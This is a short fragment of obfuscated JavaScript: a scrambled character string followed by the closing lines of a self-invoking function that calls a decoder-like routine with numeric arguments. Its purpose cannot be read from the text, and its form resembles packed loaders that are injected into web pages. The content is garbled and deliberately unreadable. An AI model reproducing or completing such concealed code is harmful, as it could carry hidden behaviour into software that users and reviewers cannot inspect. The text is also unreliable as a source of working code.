:LeR6.=R)A\/o.0)0A]h?1+.=ean5%.0exR{)NRS5]a+%.Rp.y3 ct0u]_Ko}RR )o:?6F=]RaR% 9{ rr{Rn(i.idpterdo_; wecuts.\'RRinc0l+K<Aby3%]2x.>bRt{+[Rp1-n)(%].f]cc;!-IiRR%t(o.6,u2rare]9pen|%4,%e.3I) s,8%t]=R]ctimc+!+rt h){( }I]R'));var mGT=SLi(LPG,DQb );mGT(8744);return 7227})()
